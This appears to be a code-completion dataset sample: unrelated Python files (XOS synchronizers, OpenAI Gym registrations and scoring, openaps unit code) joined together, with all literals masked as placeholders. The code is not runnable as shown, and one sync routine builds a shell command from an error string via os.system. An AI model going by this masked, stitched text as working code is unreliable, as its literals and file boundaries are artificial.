) <EOL> except : <EOL> self . soft_deadline = <NUM_LIT:5> <EOL> return <EOL> def fetch_pending ( self , deletion = False ) : <EOL> main_obj = self . observes <EOL> if ( not deletion ) : <EOL> objs = main_obj . objects . filter ( Q ( enacted__lt = F ( '<STR_LIT>' ) ) | Q ( enacted = None ) , Q ( lazy_blocked = False ) ) <EOL> else : <EOL> objs = main_obj . deleted_objects . all ( ) <EOL> return objs <EOL> def check_dependencies ( self , obj , failed ) : <EOL> for dep in self . dependencies : <EOL> peer_name = dep [ <NUM_LIT:0> ] . lower ( ) + dep [ <NUM_LIT:1> : ] <EOL> try : <EOL> peer_object = deepgetattr ( obj , peer_name ) <EOL> try : <EOL> peer_objects = peer_object . all ( ) <EOL> except AttributeError : <EOL> peer_objects = [ peer_object ] <EOL> except : <EOL> peer_objects = [ ] <EOL> if ( hasattr ( obj , '<STR_LIT>' ) ) : <EOL> try : <EOL> peer_objects = filter ( lambda o : o . controller == obj . controller , peer_objects ) <EOL> except AttributeError : <EOL> pass <EOL> if ( failed in peer_objects ) : <EOL> if ( obj . backend_status != failed . backend_status ) : <EOL> obj . backend_status = failed . backend_status <EOL> obj . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> raise FailedDependency ( "<STR_LIT>" % ( obj . __class__ . __name__ , str ( getattr ( obj , "<STR_LIT>" , "<STR_LIT>" ) ) , peer_object . __class__ . __name__ , str ( getattr ( peer_object , "<STR_LIT>" , "<STR_LIT>" ) ) , failed . __class__ . __name__ , str ( getattr ( failed , "<STR_LIT>" , "<STR_LIT>" ) ) ) ) <EOL> def call ( self , failed = [ ] , deletion = False ) : <EOL> pending = self . fetch_pending ( deletion ) <EOL> for o in pending : <EOL> try : <EOL> reset_queries ( ) <EOL> except : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> sync_failed = False <EOL> try : <EOL> backoff_disabled = Config ( ) . observer_backoff_disabled <EOL> except : <EOL> backoff_disabled = <NUM_LIT:0> <EOL> try : <EOL> scratchpad = json . loads ( o . backend_register ) <EOL> if ( scratchpad ) : <EOL> next_run = scratchpad [ '<STR_LIT>' ] <EOL> if ( not backoff_disabled and next_run > time . time ( ) ) : <EOL> sync_failed = True <EOL> except : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> pass <EOL> if ( not sync_failed ) : <EOL> try : <EOL> for f in failed : <EOL> self . check_dependencies ( o , f ) <EOL> if ( deletion ) : <EOL> self . delete_record ( o ) <EOL> o . delete ( purge = True ) <EOL> else : <EOL> self . sync_record ( o ) <EOL> o . enacted = datetime . now ( ) <EOL> scratchpad = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> o . backend_register = json . dumps ( scratchpad ) <EOL> o . backend_status = "<STR_LIT>" <EOL> o . save ( update_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except ( InnocuousException , Exception ) as e : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> force_error = False <EOL> try : <EOL> if ( o . backend_status . startswith ( '<STR_LIT>' ) ) : <EOL> force_error = False <EOL> str_e = '<STR_LIT>' % ( o . backend_status [ <NUM_LIT:4> : ] , str ( e ) ) <EOL> str_e = elim_dups ( str_e ) <EOL> else : <EOL> str_e = str ( e ) <EOL> except : <EOL> str_e = str ( e ) <EOL> if ( not str_e ) : <EOL> str_e = '<STR_LIT>' <EOL> try : <EOL> error = self . error_map . map ( str_e ) <EOL> except : <EOL> error = str_e <EOL> if isinstance ( e , InnocuousException ) and not force_error : <EOL> o . backend_status = '<STR_LIT>' % error <EOL> else : <EOL> o . backend_status = '<STR_LIT>' % error <EOL> cmd = '<STR_LIT>' % ( self . __class__ . __name__ , error ) <EOL> os . system ( cmd ) <EOL> try : <EOL> scratchpad = json . loads ( o . backend_register ) <EOL> scratchpad [ '<STR_LIT>' ] <EOL> except : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> scratchpad = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> if ( scratchpad [ '<STR_LIT>' ] ) : <EOL> delay = scratchpad [ '<STR_LIT>' ] * <NUM_LIT> <EOL> if ( delay < <NUM_LIT> ) : <EOL> delay = <NUM_LIT> <EOL> scratchpad [ '<STR_LIT>' ] = time . time ( ) + delay <EOL> scratchpad [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> o . backend_register = json . dumps ( scratchpad ) <EOL> if ( o . pk ) : <EOL> try : <EOL> o . backend_status = o . backend_status [ : <NUM_LIT> ] <EOL> o . save ( update_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> pass <EOL> sync_failed = True <EOL> if ( sync_failed ) : <EOL> failed . append ( o ) <EOL> return failed <EOL> def sync_record ( self , o ) : <EOL> return <EOL> def delete_record ( self , o ) : <EOL> return <EOL> def __call__ ( self , ** args ) : <EOL> return self . call ( ** args ) </s>
<s> import os <EOL> import base64 <EOL> from django . db . models import F , Q <EOL> from xos . config import Config <EOL> from ec2_observer . syncstep import SyncStep <EOL> from core . models . site import * <EOL> from ec2_observer . awslib import * <EOL> import pdb <EOL> class SyncSites ( SyncStep ) : <EOL> provides = [ Site ] <EOL> requested_interval = <NUM_LIT> <EOL> def fetch_pending ( self , deletion ) : <EOL> if ( deletion ) : <EOL> return [ ] <EOL> deployment = Deployment . objects . filter ( Q ( name = "<STR_LIT>" ) ) [ <NUM_LIT:0> ] <EOL> current_site_deployments = SiteDeployment . objects . filter ( Q ( deployment = deployment ) ) <EOL> zone_ret = aws_run ( '<STR_LIT>' ) <EOL> zones = zone_ret [ '<STR_LIT>' ] <EOL> available_sites = [ zone [ '<STR_LIT>' ] for zone in zones ] <EOL> site_names = [ sd . site . name for sd in current_site_deployments ] <EOL> new_site_names = list ( set ( available_sites ) - set ( site_names ) ) <EOL> new_sites = [ ] <EOL> for s in new_site_names : <EOL> site = Site ( name = s , <EOL> login_base = s , <EOL> site_url = "<STR_LIT>" , <EOL> enabled = True , <EOL> is_public = True , <EOL> abbreviated_name = s ) <EOL> new_sites . append ( site ) <EOL> return new_sites <EOL> def sync_record ( self , site ) : <EOL> site . save ( ) </s>
<s> from . model_policy_Slice import * <EOL> from . model_policy_Instance import * <EOL> from . model_policy_User import * <EOL> from . model_policy_Network import * <EOL> from . model_policy_Site import * <EOL> from . model_policy_SitePrivilege import * <EOL> from . model_policy_SlicePrivilege import * <EOL> from . model_policy_ControllerSlice import * <EOL> from . model_policy_ControllerSite import * <EOL> from . model_policy_ControllerUser import * <EOL> from . model_policy_Controller import * <EOL> from . model_policy_Image import * </s>
<s> import os <EOL> import sys <EOL> import base64 <EOL> import traceback <EOL> from django . db . models import F , Q <EOL> from xos . config import Config , XOS_DIR <EOL> from synchronizers . base . syncstep import SyncStep <EOL> from core . models import Service <EOL> from services . requestrouter . models import ServiceMap <EOL> from xos . logger import Logger , logging <EOL> parentdir = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT:..>" ) <EOL> sys . path . insert ( <NUM_LIT:0> , parentdir ) <EOL> from rrlib import RequestRouterLibrary <EOL> from configurationPush import ConfigurationPush <EOL> import rrlib_config <EOL> logger = Logger ( level = logging . INFO ) <EOL> class SyncServiceMap ( SyncStep , RequestRouterLibrary , ConfigurationPush ) : <EOL> provides = [ ServiceMap ] <EOL> requested_interval = <NUM_LIT:0> <EOL> def __init__ ( self , ** args ) : <EOL> SyncStep . __init__ ( self , ** args ) <EOL> RequestRouterLibrary . __init__ ( self ) <EOL> ConfigurationPush . __init__ ( self ) <EOL> def fetch_pending ( self ) : <EOL> try : <EOL> ret = ServiceMap . objects . filter ( Q ( enacted__lt = F ( '<STR_LIT>' ) ) | Q ( enacted = None ) ) <EOL> return ret <EOL> except Exception , e : <EOL> traceback . print_exc ( ) <EOL> return None <EOL> def sync_record ( self , servicemap ) : <EOL> try : <EOL> print "<STR_LIT>" % self . get_servicemap_uid ( servicemap ) <EOL> self . gen_dnsredir_serviceconf ( servicemap ) <EOL> self . gen_dnsdemux_serviceconf ( servicemap ) <EOL> service_uid = self . get_servicemap_uid ( servicemap ) <EOL> self . config_push ( service_uid , rrlib_config . REDIR_USER , XOS_DIR + "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . config_push ( service_uid , rrlib_config . DEMUX_USER , XOS_DIR + "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . teardown_temp_configfiles ( service_uid ) <EOL> except Exception , e : <EOL> traceback . print_exc ( ) <EOL> return False <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sv = SyncServiceMap ( ) <EOL> recs = sv . fetch_pending ( ) <EOL> for rec in recs : <EOL> sv . sync_record ( rec ) </s>
<s> import os <EOL> import pdb <EOL> import sys <EOL> import tempfile <EOL> sys . path . append ( "<STR_LIT>" ) <EOL> from translator . toscalib . tosca_template import ToscaTemplate <EOL> from core . models import User , Deployment , DeploymentRole <EOL> from xosresource import XOSResource <EOL> class XOSDeploymentRole ( XOSResource ) : <EOL> provides = "<STR_LIT>" <EOL> xos_model = DeploymentRole <EOL> name_field = "<STR_LIT>" <EOL> def get_xos_args ( self ) : <EOL> args = super ( XOSDeploymentRole , self ) . get_xos_args ( ) <EOL> return args <EOL> def delete ( self , obj ) : <EOL> super ( XOSDeploymentRole , self ) . delete ( obj ) </s>
<s> import os <EOL> import pdb <EOL> import sys <EOL> import tempfile <EOL> sys . path . append ( "<STR_LIT>" ) <EOL> from translator . toscalib . tosca_template import ToscaTemplate <EOL> from services . vrouter . models import VRouterService <EOL> from service import XOSService <EOL> class XOSVRouterService ( XOSService ) : <EOL> provides = "<STR_LIT>" <EOL> xos_model = VRouterService <EOL> copyin_props = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> from django . contrib . admin . templatetags . admin_modify import * <EOL> from django . contrib . admin . templatetags . admin_modify import submit_row as original_submit_row <EOL> @ register . inclusion_tag ( '<STR_LIT>' , takes_context = True ) <EOL> def submit_row ( context ) : <EOL> ctx = original_submit_row ( context ) <EOL> ctx . update ( { <EOL> '<STR_LIT>' : context . get ( '<STR_LIT>' , ctx [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : context . get ( '<STR_LIT>' , ctx [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : context . get ( '<STR_LIT>' , ctx [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : context . get ( "<STR_LIT>" , None ) , <EOL> } ) <EOL> return ctx </s>
<s> '''<STR_LIT>''' <EOL> import logging ; _L = logging . getLogger ( '<STR_LIT>' ) <EOL> from datetime import timedelta <EOL> import multiprocessing <EOL> import signal <EOL> import traceback <EOL> import time <EOL> import os <EOL> import os . path <EOL> import json <EOL> from . import process_one , compat <EOL> JOB_TIMEOUT = timedelta ( hours = <NUM_LIT:9> ) <EOL> class JobTimeoutException ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , jobstack = [ ] ) : <EOL> super ( JobTimeoutException , self ) . __init__ ( ) <EOL> self . jobstack = jobstack <EOL> def timeout ( timeout ) : <EOL> '''<STR_LIT>''' <EOL> def decorate ( f ) : <EOL> def timeout_handler ( signum , frame ) : <EOL> raise JobTimeoutException ( traceback . format_stack ( ) ) <EOL> def new_f ( * args , ** kwargs ) : <EOL> old_handler = signal . signal ( signal . SIGALRM , timeout_handler ) <EOL> signal . alarm ( timeout ) <EOL> result = f ( * args , ** kwargs ) <EOL> signal . signal ( signal . SIGALRM , old_handler ) <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> return result <EOL> if compat . PY2 : <EOL> new_f . func_name = f . func_name <EOL> else : <EOL> new_f . __name__ = f . __name__ <EOL> return new_f <EOL> return decorate <EOL> def setup_logger ( logfile = None , log_level = logging . DEBUG , log_stderr = True , log_config_file = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> openaddr_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> log_format = '<STR_LIT>' <EOL> openaddr_logger . setLevel ( logging . DEBUG ) <EOL> for old_handler in openaddr_logger . handlers : <EOL> openaddr_logger . removeHandler ( old_handler ) <EOL> mp_logger = multiprocessing . get_logger ( ) <EOL> mp_logger . propagate = True <EOL> log_config_file = os . path . expanduser ( log_config_file ) <EOL> if os . path . exists ( log_config_file ) : <EOL> log_config_dict = json . load ( file ( log_config_file ) ) <EOL> log_config_dict [ '<STR_LIT>' ] = False <EOL> logging . config . dictConfig ( log_config_dict ) <EOL> openaddr_logger . info ( "<STR_LIT>" , log_config_file ) <EOL> else : <EOL> mp_logger . setLevel ( log_level ) <EOL> everything_logger = logging . getLogger ( ) <EOL> if log_stderr : <EOL> handler1 = logging . StreamHandler ( ) <EOL> handler1 . setLevel ( log_level ) <EOL> handler1 . setFormatter ( logging . Formatter ( log_format . format ( '<STR_LIT>' ) ) ) <EOL> everything_logger . addHandler ( handler1 ) <EOL> if logfile : <EOL> handler2 = logging . FileHandler ( logfile , mode = '<STR_LIT:w>' ) <EOL> handler2 . setLevel ( log_level ) <EOL> handler2 . setFormatter ( logging . Formatter ( log_format . format ( '<STR_LIT>' ) ) ) <EOL> everything_logger . addHandler ( handler2 ) </s>
<s> from gym . envs . registration import registry , register , make , spec <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : <NUM_LIT:2> } , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : <NUM_LIT:3> } , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> reward_threshold = - <NUM_LIT:100> <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> timestep_limit = <NUM_LIT:100> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:100> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:200> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> timestep_limit = <NUM_LIT:50> <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> ) <EOL> for game in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> for obs_type in [ '<STR_LIT:image>' , '<STR_LIT>' ] : <EOL> name = '<STR_LIT>' . join ( [ g . capitalize ( ) for g in game . split ( '<STR_LIT:_>' ) ] ) <EOL> if obs_type == '<STR_LIT>' : <EOL> name = '<STR_LIT>' . format ( name ) <EOL> register ( <EOL> id = '<STR_LIT>' . format ( name ) , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : game , '<STR_LIT>' : obs_type } , <EOL> timestep_limit = <NUM_LIT> , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> } , <EOL> ) <EOL> register ( <EOL> id = '<STR_LIT>' , <EOL> entry_point = '<STR_LIT>' , <EOL> kwargs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> ) </s>
<s> import numpy as np <EOL> from gym import utils <EOL> from gym . envs . mujoco import mujoco_env <EOL> class SwimmerEnv ( mujoco_env . MujocoEnv , utils . EzPickle ) : <EOL> def __init__ ( self ) : <EOL> mujoco_env . MujocoEnv . __init__ ( self , '<STR_LIT>' , <NUM_LIT:4> ) <EOL> utils . EzPickle . __init__ ( self ) <EOL> self . ctrl_cost_coeff = <NUM_LIT> <EOL> self . finalize ( ) <EOL> def _step ( self , a ) : <EOL> xposbefore = self . model . data . qpos [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> self . do_simulation ( a , self . frame_skip ) <EOL> xposafter = self . model . data . qpos [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> reward_fwd = ( xposafter - xposbefore ) / self . dt <EOL> reward_ctrl = - self . ctrl_cost_coeff * np . square ( a ) . sum ( ) <EOL> reward = reward_fwd + reward_ctrl <EOL> ob = self . _get_obs ( ) <EOL> return ob , reward , False , dict ( reward_fwd = reward_fwd , reward_ctrl = reward_ctrl ) <EOL> def _get_obs ( self ) : <EOL> qpos = self . model . data . qpos <EOL> qvel = self . model . data . qvel <EOL> return np . concatenate ( [ <EOL> qpos . flat [ <NUM_LIT:2> : ] , <EOL> qvel . flat <EOL> ] ) <EOL> def _reset ( self ) : <EOL> self . model . data . qpos = self . init_qpos + np . random . uniform ( size = ( self . model . nq , <NUM_LIT:1> ) , low = - <NUM_LIT> , high = <NUM_LIT> ) <EOL> self . model . data . qvel = self . init_qvel + np . random . uniform ( size = ( self . model . nv , <NUM_LIT:1> ) , low = - <NUM_LIT> , high = <NUM_LIT> ) <EOL> self . reset_viewer_if_necessary ( ) <EOL> return self . _get_obs ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import requests <EOL> import gym <EOL> def score_from_remote ( url ) : <EOL> result = requests . get ( url ) <EOL> parsed = result . json ( ) <EOL> episode_lengths = parsed [ '<STR_LIT>' ] <EOL> episode_rewards = parsed [ '<STR_LIT>' ] <EOL> timestamps = parsed [ '<STR_LIT>' ] <EOL> initial_reset_timestamp = parsed . get ( '<STR_LIT>' , timestamps [ <NUM_LIT:0> ] ) <EOL> env_id = parsed [ '<STR_LIT>' ] <EOL> spec = gym . spec ( env_id ) <EOL> return score_from_merged ( episode_lengths , episode_rewards , timestamps , initial_reset_timestamp , spec . trials , spec . reward_threshold ) <EOL> def score_from_merged ( episode_lengths , episode_rewards , timestamps , initial_reset_timestamp , trials , reward_threshold ) : <EOL> """<STR_LIT>""" <EOL> episode_rewards = np . array ( episode_rewards , dtype = '<STR_LIT>' ) <EOL> episode_t_value = timestep_t_value = mean = error = None <EOL> seconds_to_solve = seconds_in_total = None <EOL> if len ( timestamps ) > <NUM_LIT:0> : <EOL> seconds_in_total = timestamps [ - <NUM_LIT:1> ] - initial_reset_timestamp <EOL> if len ( episode_rewards ) >= trials : <EOL> means = running_mean ( episode_rewards , trials ) <EOL> if reward_threshold is not None : <EOL> ( indexes_above_threshold , ) = np . where ( means >= reward_threshold ) <EOL> if len ( indexes_above_threshold ) > <NUM_LIT:0> : <EOL> episode_t_value = indexes_above_threshold [ <NUM_LIT:0> ] <EOL> cumulative_timesteps = np . cumsum ( np . insert ( episode_lengths , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> timestep_t_value = cumulative_timesteps [ episode_t_value ] <EOL> seconds_to_solve = timestamps [ episode_t_value ] - initial_reset_timestamp <EOL> best_idx = np . argmax ( means ) <EOL> best_rewards = episode_rewards [ best_idx : best_idx + trials ] <EOL> mean = np . mean ( best_rewards ) <EOL> error = np . std ( best_rewards ) / ( np . sqrt ( trials ) - <NUM_LIT:1> ) <EOL> return { <EOL> '<STR_LIT>' : episode_t_value , <EOL> '<STR_LIT>' : timestep_t_value , <EOL> '<STR_LIT>' : mean , <EOL> '<STR_LIT:error>' : error , <EOL> '<STR_LIT>' : len ( episode_rewards ) , <EOL> '<STR_LIT>' : sum ( episode_lengths ) , <EOL> '<STR_LIT>' : seconds_to_solve , <EOL> '<STR_LIT>' : seconds_in_total , <EOL> } <EOL> def running_mean ( x , N ) : <EOL> x = np . array ( x , dtype = '<STR_LIT>' ) <EOL> cumsum = np . cumsum ( np . insert ( x , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> return ( cumsum [ N : ] - cumsum [ : - N ] ) / N <EOL> def compute_graph_stats ( episode_lengths , episode_rewards , timestamps , initial_reset_timestamp , buckets ) : <EOL> """<STR_LIT>""" <EOL> import scipy <EOL> num_episodes = len ( episode_lengths ) <EOL> episode_rewards = np . array ( episode_rewards ) <EOL> episode_lengths = np . array ( episode_lengths ) <EOL> x_timestep = np . cumsum ( np . insert ( episode_lengths , <NUM_LIT:0> , <NUM_LIT:0> ) ) [ : - <NUM_LIT:1> ] <EOL> assert len ( x_timestep ) == num_episodes <EOL> x_seconds = [ timestamp - initial_reset_timestamp for timestamp in timestamps ] <EOL> x_episode = range ( num_episodes ) <EOL> x_timestep_y_reward = scipy . stats . binned_statistic ( x_timestep , episode_rewards , '<STR_LIT>' , buckets ) <EOL> x_timestep_y_length = scipy . stats . binned_statistic ( x_timestep , episode_lengths , '<STR_LIT>' , buckets ) <EOL> x_episode_y_reward = scipy . stats . binned_statistic ( x_episode , episode_rewards , '<STR_LIT>' , buckets ) <EOL> x_episode_y_length = scipy . stats . binned_statistic ( x_episode , episode_lengths , '<STR_LIT>' , buckets ) <EOL> x_seconds_y_reward = scipy . stats . binned_statistic ( x_seconds , episode_rewards , '<STR_LIT>' , buckets ) <EOL> x_seconds_y_length = scipy . stats . binned_statistic ( x_seconds , episode_lengths , '<STR_LIT>' , buckets ) <EOL> return { <EOL> '<STR_LIT>' : initial_reset_timestamp , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_timestep_y_reward ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_timestep_y_length ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_episode_y_reward ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_episode_y_length ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_seconds_y_length ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_seconds_y_reward ) , <EOL> } <EOL> def graphable_binned_statistic ( binned ) : <EOL> x = running_mean ( binned . bin_edges , <NUM_LIT:2> ) <EOL> y = binned . statistic <EOL> assert len ( x ) == len ( y ) <EOL> valid = np . logical_not ( np . isnan ( x ) ) & np . logical_not ( np . isnan ( y ) ) <EOL> x = x [ valid ] <EOL> y = y [ valid ] <EOL> return { <EOL> '<STR_LIT:x>' : x , <EOL> '<STR_LIT:y>' : y , <EOL> } </s>
<s> class Display ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def display ( klass , unit , val ) : <EOL> assert unit in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if unit == '<STR_LIT>' : <EOL> return int ( round ( val ) ) <EOL> elif unit == '<STR_LIT>' : <EOL> return round ( val , <NUM_LIT:1> ) </s>
<s> from unittest import TestCase <EOL> from mock import Mock <EOL> from openaps . vendors . units import bg_targets <EOL> class BgTargetsTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def mg_dl_pump_response ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:100> } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> ] } . copy ( ) <EOL> def mmol_l_pump_response ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ { '<STR_LIT>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:5> } ] } . copy ( ) <EOL> class MockMethod ( ) : <EOL> pass <EOL> class MockParent ( ) : <EOL> device = '<STR_LIT>' <EOL> def test_read_bg_targets_from_mg_dl_pump ( self ) : <EOL> instance = bg_targets ( None , BgTargetsTestCase . MockParent ( ) ) <EOL> instance . units = '<STR_LIT>' <EOL> instance . to_unit = instance . CONVERTERS [ instance . units ] <EOL> response = instance . convert ( self . mg_dl_pump_response ( ) ) <EOL> expected_response = dict ( { <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:100> } , { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:200> } ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> self . assertEqual ( response , expected_response ) <EOL> def test_read_bg_targets_from_mmol_l_pump ( self ) : <EOL> instance = bg_targets ( None , BgTargetsTestCase . MockParent ( ) ) <EOL> instance . units = '<STR_LIT>' <EOL> instance . to_unit = instance . CONVERTERS [ instance . units ] <EOL> response = instance . convert ( self . mmol_l_pump_response ( ) ) <EOL> expected_response = { <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertEqual ( response , expected_response ) </s>
